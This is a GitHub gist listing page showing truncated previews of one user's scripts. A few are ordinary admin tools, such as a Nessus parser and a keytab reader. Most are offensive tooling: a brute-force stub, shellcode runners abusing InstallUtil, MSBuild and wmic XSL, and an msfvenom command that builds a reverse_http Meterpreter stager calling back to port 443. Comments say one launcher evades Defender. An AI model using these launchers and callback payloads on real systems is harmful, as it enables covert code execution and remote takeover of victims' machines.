0xhexmex
0xhexmex
/ james-admin-brute.py
Created
October 11, 2018 05:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import socket | |
| import sys | |
| import os | |
| host = 'TARGET IP ADDRESS HERE' | |
| port = 4555 | |
| try: |
0xhexmex
/ FindHTTPinNessus.ps1
Last active
December 1, 2018 22:05
— forked from nullbind/FindIIS6inNessus.ps1
This script can be used to extract a list of HTTP servers from .nessus files.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This script can be used to extract a list of HTTP servers from .nessus files. | |
| # Original Author: Scott Sutherland, NetSPI 2017 | |
| # Modified by KM 11/2018 to extract a list of all HTTP servers, not just IIS6 | |
| # Instructions: Run the script in a directory containing only .nessus files. Super dirty/slow, but functional. | |
| # Create an output table | |
| $outputtbl =New-Object System.Data.DataTable | |
| $outputtbl.Columns.Add("IpAddress") | Out-Null | |
| $outputtbl.Columns.Add("WebServerVersion") | Out-Null |
0xhexmex
/ Get-KerberosKeytab.ps1
Created
February 14, 2019 21:50
— forked from raandree/Get-KerberosKeytab.ps1
Parses Kerberos Keytab files
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| param( | |
| [Parameter(Mandatory)] | |
| [string]$Path | |
| ) | |
| #Created by Pierre.Audonnet@microsoft.com | |
| # | |
| #Got keytab structure from http://www.ioplex.com/utilities/keytab.txt | |
| # | |
| # keytab { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Created by Joaquim Nogueira (@lkys37en), March 2019. I take no credit for this awesome work :) | |
| #!/bin/bash | |
| print_usage() { | |
| echo "" | |
| echo "A huge thank you to Brax from proslackers for helping me with this script, thank you!" | |
| echo "" | |
| echo "Usage: $0 -d lkylabs.com -u Administrator -p Welcome1! -o OU=Linux-Servers,OU=Servers,OU=Computers,OU=lkylabs,DC=lkylabs,DC=com -s 'lkylabs\\domain^admins lkylabs\\linux^admins' -x 'lkylabs\\domain^admins'" | |
| echo |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Another gem from Joaquim Nogueira (@lkys37en) | |
| #!/bin/bash | |
| #Reference:https://www.valuebound.com/resources/blog/Installing-drupal-with-drush-the-basics | |
| #Reference:https://websiteforstudents.com/install-drupal-cms-on-ubuntu-16-04-lts-with-apache2-mariadb-php-7-1-and-lets-encrypt-ssl-tls/ | |
| print_usage() { | |
| echo "" | |
| echo "Usage: $0 -v drupal-8.5.0 -p Welcome1" | |
| echo |
0xhexmex
/ installutil - shellcode runner
Last active
June 14, 2022 22:28
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Almost entirely adopted from Casey Smith's POC -- reference link here https://gist.github.com/lithackr/b692378825e15bfad42f78756a5a3260 | |
| // First compile like this: | |
| // .\csc.exe /unsafe /platform:x86 /out:lol.exe .\goodpayload.cs | |
| // Then run exe like this: | |
| // .\InstallUtil.exe /logfile= /LogToConsole=false /U .\lol.exe | |
| using System; | |
| using System.Net; | |
| using System.Diagnostics; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Template taken from https://github.com/infosecn1nja/MaliciousMacroMSBuild/blob/master/templates/MSBuild_shellcode.csproj | |
| Example to create a CS beacon stager, base64-encoded to insert into "strShellCode" variable below | |
| msfvenom -p windows/meterpeter/reverse_http LHOST=1.1.1.1 LPORT=443 -f raw -o /tmp/payload.bin && base64 -w0 /tmp/payload.bin | |
| Then execute this on target with "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe .\msbuild-shellcode.xml" | |
| Defender doesn't flag on this (as of 5/30/19) | |
| */ | |
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <Target Name="[TARGETNAME]"> | |
| <ClassExample /> |
0xhexmex
/ generic-shellcode-launcher.cs
Last active
January 15, 2021 08:39
wmic code execution template
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Template taken from https://github.com/infosecn1nja/MaliciousMacroMSBuild/blob/master/templates/MSBuild_shellcode.csproj | |
| // Compile: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.exe /platform:x86 /unsafe mylauncher.cs | |
| // Or as dll: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.dll /platform:x86 /target:library /unsafe mylauncher.cs | |
| // Then DotNetToJScript.exe -v Auto -l JScript -o mylauncher.js -c ShellCodeLauncher.Program c:\test.dll | |
| // mylauncher.js can be put into something like a WMIC XSL template like so... | |
| /* | |
| // wmic-template.xsl | |
| // wmic os get /format:wmic-template.xsl (if you create x86 shellcode, need to use x86 version of wmic here - c:\windows\syswow64\wbem\wmic.exe) |
0xhexmex
/ Static python executable.txt
Last active
December 1, 2023 14:50
How to turn a python script into a statically linked executable with pyinstaller and staticx
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Example below is with mitm6 (https://github.com/fox-it/mitm6/) | |
| // Note: Adding the '--add-binary' option here is specific to mitm6, not required in all cases. | |
| # pip install pyinstaller | |
| # pyinstaller --clean -F --add-binary="/usr/lib/x86_64-linux-gnu/libpython2.7.so.1.0:." ./mitm6.py | |
| // The step above will create a single binary in the ./dist/ directory called mitm6 | |
| // Install staticx and dependencies |
0xhexmex
/ sc_launcher_norwx.cs
Last active
May 24, 2023 23:58
C# shellcode launcher without using RWX memory
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Execute shellcode without using RWX memory | |
| // Will get caught by Defender as-is | |
| // Compile: C:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:sclaunch-norwx.exe /unsafe /platform:x86 .\sc_launcher_norwx.cs | |
| using System; | |
| using System.Runtime.InteropServices; | |
| namespace ShellCodeLauncher | |
| { |
OlderNewer